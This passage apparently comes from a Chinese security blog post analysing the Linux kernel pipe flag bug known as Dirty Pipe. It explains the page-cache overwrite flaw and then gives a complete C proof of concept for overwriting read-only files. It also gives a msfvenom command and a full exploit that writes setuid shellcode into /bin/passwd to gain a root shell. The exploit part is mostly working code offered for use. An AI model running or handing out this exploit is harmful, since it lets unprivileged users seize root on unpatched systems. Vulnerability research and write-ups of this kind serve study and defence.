ssize_t generic_file_buffered_read(struct kiocb *iocb, struct iov_iter *iter, ssize_t written) { struct file *filp = iocb->ki_filp; struct file_ra_state *ra = &filp->f_ra; struct address_space *mapping = filp->f_mapping; struct inode *inode = mapping->host; struct page *pages_onstack[PAGEVEC_SIZE], **pages = NULL; unsigned int nr_pages = min_t(unsigned int, 512, ((iocb->ki_pos + iter->count + PAGE_SIZE - 1) >> PAGE_SHIFT) - (iocb->ki_pos >> PAGE_SHIFT)); int i, pg_nr, error = 0; bool writably_mapped; loff_t isize, end_offset; if (unlikely(iocb->ki_pos >= inode->i_sb->s_maxbytes)) return 0; if (unlikely(!iov_iter_count(iter))) return 0; ... copied = copy_page_to_iter(pages[i], offset, bytes, iter); ... }
  • 尝试在该文件已有的文件缓存映射表中查找之前已经映射过的文件缓存页
    • 如果没有缓存 则读取文件 创建缓存
    • 如果有缓存但是缓存过期了 则更新缓存
  • 调用copy_page_to_iter()将文件缓存页中的数据拷贝进pipe中

至此整体已经和之前pipe相关的函数链接上了

0x03 漏洞分析


根据前面的分析基本上漏洞思路很明晰了

  • 创建一个管道 注意不需要O_DIRECT标志
  • 往管道内写入大量数据 耗尽所有pipe_buffer 此时根据pipe_write中的调用 所有pipe_buffer的flag为PIPE_BUF_FLAG_CAN_MERGE
  • 将所有数据读出 释放pipe_buffer
  • 使用splice读入一个文件 要求此文件大小与页面不对齐 生成文件缓存页
  • 直接向管道中写入数据 因为PIPE_BUF_FLAG_CAN_MERGE的原因 Kernel会将数据写入到文件缓存页中
  • 至此完成了越权写的操作

主要漏洞原因是未对pipe_buffer的标志位进行初始化造成的

0x04 漏洞利用


POC

POC如下

c
#define _GNU_SOURCE #include <fcntl.h> #include <stdlib.h> #include <stdio.h> #include <unistd.h> #include <strings.h> #include <sys/stat.h> #include <sys/user.h> void errExit(char *buf) { printf("[x] ERROR: %s", buf); exit(EXIT_FAILURE); } int main(int argc, char **argv, char **envp) { size_t page_size; size_t offset_infile; int target_filefd; struct stat target_filestat; size_t data_length; int pipe_fd[2]; int pipe_size; char *buffer; int retval; if (argc < 4) { puts("[*] Usage: ./exp target_file offset_in_file data"); exit(EXIT_FAILURE); } page_size = sysconf(_SC_PAGESIZE); offset_infile = strtoul(argv[2], NULL, 0); if (offset_infile % page_size == 0) { errExit("Can't write on a whole page"); } target_filefd = open(argv[1], O_WRONLY); if (target_filefd < 0) { errExit("Open error"); } if (fstat(target_filefd, &target_filestat) < 0) { errExit("fstat error"); } data_length = strlen(argv[3]); if (offset_infile + data_length > target_filestat.st_size) { errExit("Can't enlarge file"); } if ((offset_infile % page_size + data_length) > page_size) { errExit("Can't write across pages"); } puts("[*] Start exploiting.."); puts("[*] Setting all pipe_buffer to PIPE_BUF_FLAG_CAN_MERGE"); pipe(pipe_fd); pipe_size = fcntl(pipe_fd[1], F_GETPIPE_SZ); buffer = (char *)malloc(pipe_size); for (int size_left = pipe_size; size_left > 0;) { int pre_write = size_left > page_size ? page_size : size_left; size_left -= write(pipe_fd[1],buffer,pre_write); } for (int size_left = pipe_size; size_left > 0;) { int pre_write = size_left > page_size ? 
page_size : size_left; size_left -= read(pipe_fd[0],buffer,pre_write); } puts("[*] flags setting success"); puts("[*] read one bytes from the file by splice"); offset_infile--; retval=splice(target_filefd,&offset_infile,pipe_fd[1],NULL,1,0); if(retval<0) { errExit("Splice error"); } else if (retval==0) { errExit("Splice is small"); } puts("[*] splice done"); retval=write(pipe_fd[1],argv[3],data_length); if(retval<0) { errExit("write error"); } else if(retval<data_length) { errExit("write too short"); } puts("[*] done"); }

编译命令

bash
gcc poc.c -o poc -static -masm=intel -g

提权

这里可以选用跟脏牛类似的提权思路 可以新建Root用户提权或者SUID提权 这里选择SUID提权

使用MSF生成payload

bash
msfvenom -p linux/x64/exec PrependSetuid=True -f elf | xxd -i

EXP如下

c
#define _GNU_SOURCE #include <fcntl.h> #include <stdlib.h> #include <stdio.h> #include <unistd.h> #include <strings.h> #include <sys/stat.h> #include <sys/user.h> void errExit(char *buf) { printf("[x] ERROR: %s", buf); exit(EXIT_FAILURE); } unsigned char shellcode[]={0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x5e, 0x6a, 0x3b, 0x58, 0x0f, 0x05}; int main(int argc, char **argv, char **envp) { size_t page_size; size_t offset_infile; int target_filefd; struct stat target_filestat; size_t data_length; int pipe_fd[2]; int pipe_size; char *buffer; int retval; page_size = sysconf(_SC_PAGESIZE); offset_infile = 1; if (offset_infile % page_size == 0) { errExit("Can't write on a whole page"); } target_filefd = open("/bin/passwd", O_RDONLY); if (target_filefd < 0) { errExit("Open error"); } if (fstat(target_filefd, &target_filestat) < 0) { errExit("fstat error"); } data_length = strlen(shellcode); if (offset_infile + data_length > target_filestat.st_size) { errExit("Can't enlarge file"); } if ((offset_infile % page_size + data_length) > page_size) { errExit("Can't write across pages"); } puts("[*] Start exploiting.."); puts("[*] Setting all pipe_buffer to 
PIPE_BUF_FLAG_CAN_MERGE"); pipe(pipe_fd); pipe_size = fcntl(pipe_fd[1], F_GETPIPE_SZ); buffer = (char *)malloc(pipe_size); for (int size_left = pipe_size; size_left > 0;) { int pre_write = size_left > page_size ? page_size : size_left; size_left -= write(pipe_fd[1],buffer,pre_write); } for (int size_left = pipe_size; size_left > 0;) { int pre_write = size_left > page_size ? page_size : size_left; size_left -= read(pipe_fd[0],buffer,pre_write); } puts("[*] flags setting success"); puts("[*] read one bytes from the file by splice"); offset_infile--; retval=splice(target_filefd,&offset_infile,pipe_fd[1],NULL,1,0); if(retval<0) { errExit("Splice error"); } else if (retval==0) { errExit("Splice is small"); } puts("[*] splice done"); retval=write(pipe_fd[1],shellcode,data_length); if(retval<0) { errExit("write error"); } else if(retval<data_length) { errExit("write too short"); } system("/bin/passwd"); puts("[*] done"); }

本文作者:Du4t

本文链接:

版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!